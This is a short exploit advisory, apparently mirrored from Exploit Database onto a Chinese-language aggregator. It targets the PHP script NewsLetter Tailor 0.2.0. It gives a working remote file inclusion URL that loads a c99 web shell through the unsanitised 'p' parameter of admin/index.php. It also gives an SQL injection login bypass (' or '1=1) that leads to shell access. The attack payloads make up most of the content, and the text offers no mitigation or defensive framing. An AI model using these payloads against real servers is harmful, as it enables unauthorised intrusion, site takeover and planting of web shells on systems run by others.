NewsLetter Tailor 0.2.0 – Remote File Inclusion

• Exploit Database
• 110 阅读

• 作者： snakespc
  日期： 2010-02-09
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/11378/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21

  ============================================================================== [»] Newsletter Tailor Remote File Include Vulnerability ============================================================================== [»] Script: [ Newsletter Tailor ] [»] Language: [ PHP ] [»] Download: [ http://sourceforge.net/projects/nlettertailor/ ] [»] Founder:[ Snakespc Email:super_cristal@hotmail.com - Site:sec-war.com/cc> ] [»] Greetz to:[ SnakesTeaM, PrEdAtOr ,alnjm33 >>> All My Mamber >> sec-war.com/cc ] [»] Note: [ Thank you ViRuSMaN on script] ########################################################################### ===[ Exploit ]=== include($p.".php"); [»] http://server/list/admin/index.php?p=http://localhost/c99.txt? [»]Note: When you update the page prompts you to log on [»](Auth Bypass) SQL Injection :user:&apos; or &apos;1=1pass:&apos; or &apos;1=1 Then be accessed on the "sh3ll" Author: Snakespc <- ###########################################################################